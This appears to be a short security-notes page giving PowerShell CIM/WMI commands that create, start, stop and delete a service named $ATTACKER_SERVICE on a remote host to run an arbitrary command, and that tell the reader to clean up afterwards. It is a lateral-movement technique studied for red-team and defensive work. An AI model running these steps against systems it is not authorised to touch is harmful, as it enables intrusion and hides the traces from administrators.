How to work with remote services using WMI and PowerShell

# Create $ATTACKER_SERVICE using the WMI session established
# in $SESSION_OBJECT.
#
Invoke-CimMethod -CimSession $SESSION_OBJECT `
                 -ClassName Win32_Service `
                 -MethodName Create `
                 -Arguments @{
                      Name = "$ATTACKER_SERVICE";
                      DisplayName = "$ATTACKER_SERVICE";
                      PathName = "$SOME_COMMAND";
                      ServiceType = [byte]::Parse("16");
                      StartMode = "Manual"
                  }
 
# Get a handle to the new service.
#
$SERVICE_OBJECT = Get-CimInstance `
                      -CimSession $SESSION_OBJECT `
                      -ClassName Win32_Service `
                      -filter "Name LIKE '$ATTACKER_SERVICE'"
 
# Invoke $ATTACKER_SERVICE.
#
Invoke-CimMethod -InputObject $SERVICE_OBJECT `
                 -MethodName StartService
 
# Make sure that $ATTACKER_SERVICE is really dead.
#
Invoke-CimMethod -InputObject $SERVICE_OBJECT `
                 -MethodName StopService
 
# Clean up after yourself.
#
Invoke-CimMethod -InputObject $SERVICE_OBJECT `
                 -MethodName Delete

Cardboard Iguana Security

Explorer

How to work with remote services using WMI and PowerShell

Graph View

Backlinks